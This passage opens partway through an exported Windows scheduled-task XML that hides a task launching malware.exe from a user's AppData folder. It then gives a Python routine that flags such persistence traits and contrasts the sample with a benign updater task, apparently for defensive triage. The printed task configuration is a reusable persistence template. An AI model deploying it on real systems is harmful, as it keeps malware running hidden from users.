<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Users\USERNAME\AppData\Roaming\winapp\malware.exe</Command>
</Exec>
</Actions>
</Task>
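The task XML above is the persistence artifact, so here is an added Python triage routine (not code from the paste) that reads an exported task and flags the traits this one shows: a command under AppData\Roaming, Hidden, no execution time limit, StartWhenAvailable, a logon trigger, and a calendar trigger repeating every few minutes. SAMPLE_TASK is the page's fragment wrapped in the standard Task Scheduler root element and namespace (the fragment on the page starts mid-document); BENIGN_TASK is constructed for contrast and is not from the page.

```python
"""Triage an exported Windows scheduled task for the persistence traits seen here.

Added example, not code from the paste. SAMPLE_TASK is the page's task
fragment wrapped in the standard Task Scheduler root element and namespace;
BENIGN_TASK is constructed for contrast.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<LogonTrigger>
<UserId>ComputerName\UserName</UserId>
</LogonTrigger>
<CalendarTrigger>
<Repetition>
<Interval>PT3M</Interval>
<Duration>P1D</Duration>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2017-08-06T08:30:10</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
<UserId>COMPUTERNAME\USERID</UserId>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<StartWhenAvailable>true</StartWhenAvailable>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec><Command>C:\Users\USERNAME\AppData\Roaming\winapp\malware.exe</Command></Exec>
</Actions>
</Task>"""

# Constructed for contrast: a vendor updater running once a day, not hidden,
# with a time limit, from a directory a standard user cannot write to.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2017-01-01T03:00:00</StartBoundary>
<ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Settings>
<StartWhenAvailable>false</StartWhenAvailable>
<Hidden>false</Hidden>
<ExecutionTimeLimit>PT1H</ExecutionTimeLimit>
</Settings>
<Actions Context="Author">
<Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command></Exec>
</Actions>
</Task>"""


def iso_duration_seconds(text):
    """Task Scheduler durations are ISO 8601 (PT3M, P1D, PT0S); D/H/M/S only."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text.strip())
    if not m:
        raise ValueError("unsupported duration: %r" % text)
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def _strip_namespace(root):
    """Drop the {namespace} prefix so paths below read like the exported XML."""
    for el in root.iter():
        if isinstance(el.tag, str) and el.tag.startswith("{"):
            el.tag = el.tag.split("}", 1)[1]
    return root


def triage_task(xml_text, repeat_threshold_s=600):
    """Return human-readable findings; an empty list means nothing notable."""
    root = _strip_namespace(ET.fromstring(xml_text))

    def text(path):
        return (root.findtext(path) or "").strip()

    findings = []
    cmd = text("./Actions/Exec/Command")
    if re.search(r"\\AppData\\(Roaming|Local)\\", cmd, re.IGNORECASE):
        findings.append("command runs from a user-writable profile directory: " + cmd)
    if text("./Settings/Hidden").lower() == "true":
        findings.append("task is hidden from the Task Scheduler UI")
    limit = text("./Settings/ExecutionTimeLimit")
    if limit and iso_duration_seconds(limit) == 0:
        findings.append("no execution time limit (PT0S): the process may run indefinitely")
    if text("./Settings/StartWhenAvailable").lower() == "true":
        findings.append("StartWhenAvailable: a missed run is started as soon as possible")
    if root.find("./Triggers/LogonTrigger") is not None:
        findings.append("logon trigger present")
    for rep in root.iterfind("./Triggers/CalendarTrigger/Repetition"):
        interval = iso_duration_seconds(rep.findtext("Interval", "PT0S"))
        if 0 < interval <= repeat_threshold_s:
            findings.append("calendar trigger repeats every %ds" % interval)
    return findings


if __name__ == "__main__":
    for name, xml_text in (("sample", SAMPLE_TASK), ("benign", BENIGN_TASK)):
        print(name, triage_task(xml_text) or ["nothing notable"])
```

Each finding on its own is common in legitimate tasks; it is the combination (user-writable path, hidden, unlimited runtime, three-minute repetition) that separates this task from the benign one, so treat the list as a score rather than a verdict.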